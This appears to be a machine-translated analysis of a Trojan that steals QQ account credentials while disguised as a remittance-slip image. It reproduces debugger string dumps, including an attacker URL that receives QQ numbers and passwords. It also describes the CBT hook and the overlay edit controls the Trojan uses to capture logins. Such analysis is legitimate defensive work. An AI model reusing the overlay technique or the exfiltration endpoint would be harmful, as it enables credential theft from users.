Analysis of a QQ account theft Trojan

File structure:Information: .exe 1.1 CrashRacoaF. fnr

A"Remittance order"Is a disguised Trojan. This image is actually under drive C:C: \ remittance slip .jpg.

 

Simple analysis file:

.Exe is the main program.

1.1 is a dll."Start". These two files are shelled and can be easily removed.

CrashRacoaF. fnr is a zip package. After decompression, there will be many files. In fact, the files here are the same. The original name is shell. dll,

The version information is: Dalian youda wutao easy language Software Development Co., Ltd., Product Name: operating system interface function support library.

We can see that this is an easy-language library, so we don't need to analyze it. We don't know why there are so many copies.

 

If you delete the 1.1file, run the file. EXE directly and the system will prompt that 1.1 cannot be found:

I think it is only a matter of such a tumble window that it does not do harm. In this case, the main functions are in 1.1. We first use OD to view the string information after shelling:

100048AD push 1.1007 BFCF c: \ remittance slip .jpg
100048E3 push 1.1007 BFDD rundll32.exe shimgvw. dll, imageview_fullscreen c: \ remittance slip .jpg
100049A1 push 1.1007C019 qq.exe
100049F9 push 1.1007C020 tm.exe
10005AF9 push 1.1007C02F qq2011
10005B12 push 1.1007C036 qq2010
10005B2B push 1.1007C03D tm2009
10005C2C mov eax, 1.1007C044 edit
100061AF push 1.1007C02F qq2011
1000641C push 1.1007C036 qq2010
10006689 push 1.1007C03D tm2009
100072FF mov eax, 1.1007C072 http://heimawangluo.3322.org/1109/9dnwdiuhd/qq.asp
10007562 push 1.1007C0AF & qqpassword =
1000756C push 1.1007C0BC? Qqnumber =
10007B6A push 1.1007C0F3 mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
10007BDF push 1.1007C0F3 mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
10007BFE push 1.1007C126 http =
10007E74 push 1.1007C12C http/1.1
10007F73 push 1.1007C135 accept:
10007FAD push 1.1007C13E accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, */* \ n
10008002 push 1.1007C1ED referer:
1000803C push 1.1007C1F7 \ n
10008046 push 1.1007C1ED referer:
1000809B push 1.1007C1FA accept-language:
100080D5 push 1.1007C20C accept-language: zh-cn \ n
10008126 push 1.1007C225 get
100081B6 push 1.1007C229 post
100081EC push 1.1007C22E content-type: application/x-www-form-urlencoded \ n
10008267 push 1.1007C1F7 \ n
1000826F push 1.1007C260 content-length:
10008409 mov ebx, 1.1000DE80 j
10008614 push 1.1007C271 set-cookie:
10008738 push 1.1007C271 set-cookie:
100087EE push 1.10077241 =
1000881F push 1.1007C27E http ://
10008A58 push 1.1007C27E http ://

 

The first line of information shows how the image named "remittance order" pops up.

The following information is the main process that traverses qq. If it exists, it is closed and you are asked to log on again.

Create a TrojanWH_CBTHOOK:

0012F2E0 100679E0/CALL to SetWindowsHookExA from 1.100679DA
0012F2E4 00000005 | HookType = WH_CBT
0012F2E8 100677B2 | Hookproc = 1.100677B2
0012F2EC 00000000 | hModule = NULL
0012F2F0 00000490 \ ThreadID = 490

Used to monitor new running Windows. If the title of the window is QQ2011, QQ2010, and tm2009, account theft starts.

The method of account theft is clever. Two subwindows are created in the QQ logon box to intercept the input:

0012F9FC 10067ADA/CALL to create‑wexa from 1.10067AD4
0012FA00 00000000 | ExtStyle = 0
0012FA04 100ABD80 | Class = "EDIT"
0012FA08 100B2324 | WindowName = ""
0012FA0C 0000100a0 | Style = WS_CHILD | WS_TABSTOP | WS_CLIPSIBLINGS | A0
0012FA10 00000001 | X = 1
0012FA14 00000000 | Y = 0
0012FA18 0000009B | Width = 9B (155 .)
0012FA1C 0000001C | Height = 1C (28 .)
0012FA20 000F01E6 | hParent = 000F01E6 (class = 'wtwindow ')
0012FA24 00000064 | hMenu = 00000064 (window)
0012FA28 10000000 | hinst= 10000000
0012FA2C 00000000 \ lParam = NULL

 

0012FA00 10067ADA/CALL to create‑wexa from 1.10067AD4
0012FA04 00000000 | ExtStyle = 0
0012FA08 0016A238 | Class = "Afx: 10000000: B: 10011: 1900015: 0"
0012FA0C 100B62F4 | WindowName = ""
0012FA10 44000000 | Style = WS_CHILD | WS_CLIPSIBLINGS
0012FA14 00000000 | X = 0
0012FA18 00000000 | Y = 0
0012FA1C 0000005D | Width = 5D (93 .)
0012FA20 00000017 | Height = 17 (23 .)
0012FA24 000F01E6 | hParent = 000F01E6 (class = 'wtwindow ')
0012FA28 0000006E | hMenu = 0000006E (window)
0012FA2C 10000000 | hinst= 10000000
0012FA30 00000000 \ lParam = NULL

Last calledSetParentYou can set the sub-control as the sub-control in the QQ logon box.

After the creation, the QQ logon box is:

The red-marked window is created by a Trojan, And the QQ logon box does not show any difference.

Later, the message loop of the created Edit is in 1.1, which serves as a sub-control of the original password box and occupies a large area so that it can intercept your input.

The "Secure Login" button (not actually a button) is also a control created by the trojan. If you enter the QQ number and password, you will definitely click the logon button,

The child Control created by the Trojan receives the message, indicating that you have entered the message. Reuse itGetWindowTextOrWM_GETTEXTObtain the QQ number in the QQ number box above,

Sent to the above URL together with the intercepted password"Http ://Heimawangluo.3322.org/1109/9dnwdiuhd/qq.asp.